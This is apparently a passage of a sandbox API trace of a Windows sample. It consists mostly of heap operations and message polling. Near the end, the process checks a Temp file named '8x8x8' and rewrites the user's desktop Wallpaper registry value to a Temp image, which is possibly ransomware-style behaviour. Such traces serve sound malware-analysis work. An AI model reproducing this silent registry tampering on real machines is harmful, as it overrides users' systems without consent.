HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0277.252] FreeLibrary (hLibModule=0x750c0000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0277.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0277.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0277.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0277.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0277.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0277.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0277.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0277.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0277.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0277.255] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0277.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0277.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0277.256] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0277.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0277.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0277.257] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0277.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0277.257] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0277.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0277.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0277.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0277.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0277.258] timeGetTime () returned 0x11857af [0277.258] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.258] Sleep (dwMilliseconds=0xa) [0277.364] timeGetTime () returned 0x1185819 [0277.364] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.364] Sleep (dwMilliseconds=0xa) [0277.503] timeGetTime () returned 0x11858a4 [0277.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.503] Sleep (dwMilliseconds=0xa) [0277.575] timeGetTime () returned 0x11858ec [0277.575] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.575] Sleep (dwMilliseconds=0xa) [0277.684] timeGetTime () returned 0x1185959 [0277.685] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.685] Sleep (dwMilliseconds=0xa) [0277.762] timeGetTime () returned 0x11859a7 [0277.763] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.763] Sleep (dwMilliseconds=0xa) [0277.814] timeGetTime () returned 0x11859db [0277.814] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0277.814] TranslateMessage (lpMsg=0x8cf798) returned 0 [0277.814] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0277.814] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0277.814] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0277.814] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.814] Sleep (dwMilliseconds=0xa) [0277.893] timeGetTime () returned 0x1185a2b [0277.893] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.893] Sleep (dwMilliseconds=0xa) [0277.929] timeGetTime () returned 0x1185a4d [0277.929] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.929] Sleep (dwMilliseconds=0xa) [0277.973] timeGetTime () returned 0x1185a79 [0277.973] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.973] Sleep (dwMilliseconds=0xa) [0278.011] timeGetTime () returned 0x1185aa0 [0278.011] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.011] Sleep (dwMilliseconds=0xa) [0278.048] timeGetTime () returned 0x1185ac4 [0278.048] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.048] Sleep (dwMilliseconds=0xa) [0278.084] timeGetTime () returned 0x1185ae9 [0278.084] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.084] Sleep (dwMilliseconds=0xa) [0278.183] timeGetTime () returned 0x1185b4d [0278.183] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.183] Sleep (dwMilliseconds=0xa) [0278.219] timeGetTime () returned 0x1185b6f [0278.219] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.219] Sleep (dwMilliseconds=0xa) [0278.254] timeGetTime () returned 0x1185b92 [0278.254] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0278.254] Sleep (dwMilliseconds=0xa) [0278.289] timeGetTime () returned 0x1185bb5 [0278.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0278.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0278.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0278.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0278.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0278.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0278.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0278.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0278.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0278.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0278.290] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0278.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0278.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0278.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0278.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0278.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0278.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0278.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0278.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0278.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0278.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0278.293] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0278.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0278.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0278.294] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0278.294] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0278.294] RegCloseKey (hKey=0x2d0) returned 0x0 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0278.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0278.295] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0278.295] CharUpperBuffW (in: 